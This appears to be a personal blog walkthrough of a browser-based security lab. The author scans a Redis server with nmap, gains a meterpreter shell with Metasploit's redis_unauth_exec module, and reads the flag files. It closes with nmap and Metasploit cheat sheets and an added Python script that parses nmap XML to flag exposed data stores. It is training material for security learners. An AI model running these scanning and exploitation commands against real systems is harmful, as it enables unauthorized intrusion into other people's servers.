I just stumbled across this funny little browser game. It’s a nice idea of gamification where you can learn some IT security skills.
I thought I’ll give it a try, so let’s play.
Start the lab to get a terminal on an attacker machine that has tools like Nmap, Metasploit, etc. installed. Your task is to get root on a target database server on the same network and in the process successfully complete the tasks on the left to win the cup!
Finding the IP of the target server:
Run «ip addr» on the shell to find all your interface IP addresses. One of the IPs will be in the range 192.X.Y.2. Your target server has the IP 192.X.Y.3
First let’s check in the terminal what IP address we have:
192.34.26.2 is our IP address. Our target must be 192.34.26.3
For the first flag we need to know on which port the Redis server is running. Let’s perform an nmap scan.
nmap -sS -sV -p- 192.34.26.3
The Redis server is running on port 6379, which is the first flag.
Let’s go over to the next puzzle…
For that we have to start the Metasploit console…
and do a query for «redis» to check the available exploits…
The second flag must be: exploit/linux/redis/redis_unauth_exec
So let’s check if we can run this exploit against our target server so that we can solve the next flag.
use exploit/linux/redis/redis_unauth_exec
check 192.34.26.3
show options
During documentation, the lab crashed once. After restarting I got a new IP address. Therefore attacker and target IP changed…
set rhosts 192.60.1.3
set lhost 192.60.1.2
set srvhost 192.60.1.2
check
exploit
We have a meterpreter shell.
Let’s see what we find. There is a file called flag, but no run.sh shell script…
Leaving the root directory to see what we have…
There’s the run.sh script
cat /run.sh
That’s the name of the service and our next flag
Last flag
cd /root
cat flag
Skills learned:
- basic commands of nmap
- basic commands of metasploit with exploiting a target
basic nmap commands:
First, how do you access the help menu?
-h
Often referred to as a stealth scan, what is the first switch listed for a ‹SYN Scan›?
-sS
Not quite as useful but how about a ‹UDP Scan›?
-sU
What about operating system detection?
-O
How about service version detection?
-sV
Most people like to see some output to know that their scan is actually doing things, what is the verbosity flag?
-v
What about ‹very verbose›? (A personal favorite)
-vv
Sometimes saving output in a common document format can be really handy for reporting, how do we save output in xml format?
-oX
Aggressive scans can be nice when other scans just aren’t getting the output that you want and you really don’t care how ‹loud› you are, what is the switch for enabling this?
-A
How do I set the timing to the max level, sometimes called ‹Insane›?
-T5
What about if I want to scan a specific port?
-p
How about if I want to scan every port?
-p-
What if I want to enable using a script from the nmap scripting engine? For this, just include the first part of the switch without specifying which script to run.
--script
What if I want to run all scripts out of the vulnerability category?
--script vuln
What switch should I include if I don’t want to ping the host?
-Pn
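The service scan above found Redis on 6379 by reading the terminal output by eye, and the cheat sheet notes that -oX saves the same result as XML for reporting. The following is an added example (my own code, not part of the game or the original post) that turns such an XML file into a short report and flags services a defender would not expect to see reachable, so the same scan can be reused for an exposure check. The embedded XML is a constructed sample shaped like nmap’s -oX output for the scan in this walkthrough; the Redis version string and the WATCHLIST set are assumptions for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sS -sV -p- -oX scan.xml 192.34.26.3` output.
# Only the elements this parser reads are included; version strings are made up.
SAMPLE_NMAP_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -p- -oX scan.xml 192.34.26.3" version="7.80">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.34.26.3" addrtype="ipv4"/>
    <ports>
      <extraports state="closed" count="65533"/>
      <port protocol="tcp" portid="22">
        <state state="filtered" reason="no-response"/>
        <service name="ssh" method="table" conf="3"/>
      </port>
      <port protocol="tcp" portid="6379">
        <state state="open" reason="syn-ack" reason_ttl="64"/>
        <service name="redis" product="Redis key-value store" version="4.0.14" method="probed" conf="10"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Hypothetical watch-list: data stores that should never face an untrusted network.
WATCHLIST = {"redis", "mongodb", "memcached", "mysql", "postgresql"}


def parse_open_ports(xml_text):
    """Return one dict per open port found in nmap XML output (all hosts)."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        for port in host.findall("ports/port"):
            state = port.find("state")
            # Skip filtered/closed ports; only open ones matter for exposure.
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            results.append({
                "host": addr,
                "port": int(port.get("portid")),
                "protocol": port.get("protocol"),
                "service": get("name"),
                "product": get("product"),
                "version": get("version"),
            })
    return results


def flag_watchlist(open_ports, watchlist=WATCHLIST):
    """Return the subset of open ports whose detected service is on the watch-list."""
    return [p for p in open_ports if p["service"] in watchlist]


def render_report(open_ports, watchlist=WATCHLIST):
    """Render a plain-text report, marking watch-listed services with '!!'."""
    lines = []
    for p in open_ports:
        mark = "!!" if p["service"] in watchlist else "  "
        detail = " ".join(x for x in (p["product"], p["version"]) if x)
        lines.append(f"{mark} {p['host']}:{p['port']}/{p['protocol']} {p['service']} {detail}".rstrip())
    return "\n".join(lines)


if __name__ == "__main__":
    # Usage with a real file: parse_open_ports(open("scan.xml").read())
    ports = parse_open_ports(SAMPLE_NMAP_XML)
    print(render_report(ports))
    for p in flag_watchlist(ports):
        print(f"exposure: {p['service']} reachable on {p['host']}:{p['port']}")
```

With the sample above the report has a single line for 6379 marked with ‹!!›, which is exactly the finding the first flag of the game is built around: a Redis instance reachable on the network segment.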
basic Metasploit commands:
how do you start the Metasploit console?
msfconsole
what command do you use to search for a specific exploit?
search «service or exploit name»
how do you use a specific exploit?
use exploit/path
how do you check if a target is vulnerable after an exploit is loaded?
check «target ip address»
how do you get the option switches of a specific exploit?
show options
how do you show and use payloads of a specific exploit?
show payloads
set payload linux/…
how do you configure the exploit options?
set rhosts
set lhost
set srvhost
how do you run a specific exploit?
exploit